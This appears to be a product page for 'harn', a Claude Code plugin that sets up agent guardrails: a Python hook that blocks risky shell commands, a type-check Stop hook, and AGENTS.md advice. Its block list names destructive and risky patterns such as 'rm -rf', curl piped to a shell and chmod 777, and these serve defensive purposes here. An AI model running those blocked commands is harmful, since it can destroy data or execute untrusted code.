The underlying AI model matters less than the system built around it. Build the environment, toolchains, and safety constraints where your AI agent operates.
/harn:init actually do?It scaffolds three shell scripts and one config file. Together, they make your AI agent stop breaking things.
rm -rf src//harn:initAGENTS.md
Lean control document (~60 lines). Tells the agent your stack, constraints, and where to find detailed rules. No bloat.
security_guard.py
PreToolUse hook. Intercepts every shell command. Blocks rm -rf, push main, chmod 777, pipe-to-shell, and more.
quality_gate.sh
Stop hook. Runs your type-checker (tsc/cargo/go vet/mypy) before the agent can finish. Broken code = blocked.
.claude/settings.json
Wires everything together. Maps hooks to lifecycle events (PreToolUse, PostToolUse, Stop). Zero manual config.
Every time an agent makes a mistake, your job is not to fix the code. Your job is to engineer the harness so the agent can never make that mistake again.
How we went from talking to AI to building systems around it
Point of influence: Wording
Focusing on phrasing and "diplomacy" to get the best one-shot response from a model.
"How do I phrase this so the AI understands?"
Point of influence: Information
Dynamically managing the information and documents the AI sees within its limited context window.
"What does the AI need to know to do this work?"
Point of influence: System / Environment
Building the environment, toolchains, and safety constraints where the AI operates autonomously.
"What environment ensures the AI works safely?"
Every agentic system has three layers
Constraints & Specifications
Don't ask the agent to write good code — mechanically enforce what good code looks like.
Tools & Interfaces
Define how the model is allowed to act — scope its tools, not just its knowledge.
Execution & Recovery
Govern how work unfolds over time — deterministic hooks as reflex arcs.
Three patterns that make the difference
Use feedforward Guides to steer behavior and feedback Sensors (linters/tests) for self-correction.
Guide = AGENTS.md tells the agent what to do
Sensor = Type checker tells the agent what went wrong
Use sub-agents to isolate tasks, preventing "context rot" from accumulating irrelevant tool-call noise.
Delegate research to a sub-agent — only the summary returns to the parent context
Implement Hooks (reflex arcs) that automatically trigger security checks or formatters without AI intervention.
PreToolUse — blocks rm -rf
PostToolUse — auto-formats
Stop — type-checks before done
Common failures and their harness solutions
Problem: Your Stop hook runs a type-checker. It fails. The agent tries to fix it. The Stop hook fires again. Fails again. Forever.
Fix: Check the stop_hook_active flag in the JSON payload. If the agent is already recovering from a Stop hook failure, let it through.
File: scripts/harness/quality_gate.sh Hook: Stop
#!/usr/bin/env bash
# Read the hook payload from stdin
PAYLOAD=$(cat /dev/stdin)
IS_ACTIVE=$(echo "$PAYLOAD" | jq -r '.stop_hook_active // false')
# CRITICAL: If already in recovery, exit clean to break the loop
if [ "$IS_ACTIVE" = "true" ]; then
exit 0
fi
# Run your actual check
npx tsc --noEmit > /tmp/gate.log 2>&1
if [ $? -ne 0 ]; then
echo "QUALITY GATE FAILED. Fix these errors:" >&2
cat /tmp/gate.log >&2
exit 2 # Block completion — agent must fix first
fi
exit 0
Wire it: .claude/settings.json → "hooks" → {"event": "Stop", "command": "bash scripts/harness/quality_gate.sh"}
Problem: The agent ran rm -rf on your source directory, or git push origin main with untested code. No guardrail stopped it.
Fix: A PreToolUse hook intercepts every Bash command before execution. If it matches a dangerous pattern, exit 2 blocks it.
File: scripts/harness/security_guard.py Hook: PreToolUse (match: Bash)
#!/usr/bin/env python3
import sys, json, re
payload = json.load(sys.stdin)
if payload.get("tool_name") != "Bash":
sys.exit(0) # Only guard shell commands
command = payload.get("parameters", {}).get("command", "")
BLOCKED = [
r"rm\s+-r[fF]", # Recursive forced deletion
r"git\s+push\s+.*main", # Push to main branch
r"git\s+push\s+.*master", # Push to master branch
r"chmod\s+777", # Reckless permissions
r"curl\s+.*\|\s*(?:sudo\s+)?(?:bash|sh)", # Pipe to shell
r">\s*~/", # Overwrite home dotfiles
]
for pattern in BLOCKED:
if re.search(pattern, command):
print(f"BLOCKED: {pattern}", file=sys.stderr)
sys.exit(2) # Block execution
sys.exit(0) # Allow
Wire it: "hooks" → {"event": "PreToolUse", "match": "Bash", "command": "python3 scripts/harness/security_guard.py"}
Problem: Your 500-line AGENTS.md worked for the first task. By the third task, the agent forgot half of it. Performance degrades as irrelevant context fills the window.
Fix: Progressive Disclosure. Keep AGENTS.md under 60 lines. Extract domain rules into skill files that load on demand when relevant.
File: AGENTS.md (max 60 lines) + skills/api-reviewer/SKILL.md (loaded on demand)
# Agent North Star
Write reliable code within architectural boundaries.
## Stack
React + TypeScript + Express
## Constraints
- Never push to main
- UI must not access DB directly — use services/ layer
- If stuck 3 times on same error, ask the human
## Active Hooks
- PreToolUse: security guard blocks dangerous commands
- Stop: type-checker must pass before completion
## Skills (load when relevant)
- API work → load skills/api-reviewer
- DB work → load skills/db-schema
Rule of thumb: if you can't read your AGENTS.md in 30 seconds, it's too long. The agent feels the same way.
Problem: You woke up to a massive PR full of broken code. The agent finished the task, but tsc shows 47 errors and 3 tests fail.
Fix: A Stop hook acts as back-pressure. The agent cannot complete until the type-checker and tests pass. It's forced to fix its own mess.
File: scripts/harness/quality_gate.sh Hook: Stop
{
"hooks": {
"PreToolUse": [{
"match": "Bash",
"command": "python3 scripts/harness/security_guard.py"
}],
"PostToolUse": [{
"match": "Edit|Write",
"command": "npx prettier --write $FILE_PATH"
}],
"Stop": [{
"command": "bash scripts/harness/quality_gate.sh"
}]
}
}
The PostToolUse hook auto-formats every file edit. The Stop hook catches type errors. Together they produce clean, passing code.
Problem: After 30 minutes, the agent starts repeating itself, forgetting constraints, and producing lower-quality output. The context window is full of grep results, file reads, and intermediate thinking.
Fix: Context Firewall via sub-agents. Delegate research, grepping, and exploration to sub-agents. Only the condensed answer returns to the parent — not the 500 lines of grep output.
# In AGENTS.md, instruct the agent:
## Context Management
- For codebase searches: delegate to a sub-agent
- For research tasks: delegate to a sub-agent
- Sub-agents return ONLY the answer (max 200 words)
- Never paste raw grep output into main context
# The sub-agent gets a fresh context window.
# It searches, processes, and returns only:
# "The function is in src/auth/login.ts:42"
# NOT the 200 lines of grep results.
Think of it like this: you don't read every email in the company — your assistant summarizes them for you. Sub-agents are that assistant for context.
Install the plugin, scaffold your harness
# Step 1: Add the marketplace
claude plugins marketplace add sliday/claude-plugins
# Step 2: Install harn
claude plugins install harn
# Step 3: In your project, run:
/harn:init
Works with Claude Code. Support for other agents coming soon.
Harness Engineering is the practice of building extra-model infrastructure — the environment, toolchains, and safety constraints — that channels an AI coding agent's power, defines its constraints, and verifies its work. It is the third generation of AI interaction, following Prompt Engineering (2022-2023) and Context Engineering (2024-2025).
CAR stands for Control, Agency, Runtime. Control defines constraints and specifications (AGENTS.md, linters, tests). Agency defines tools and interfaces (MCP servers, sub-agents). Runtime governs execution and recovery (hooks, retries, rollback).
Install via Claude Code: claude plugins marketplace add sliday/claude-plugins && claude plugins install harn. Then run /harn:init in your project.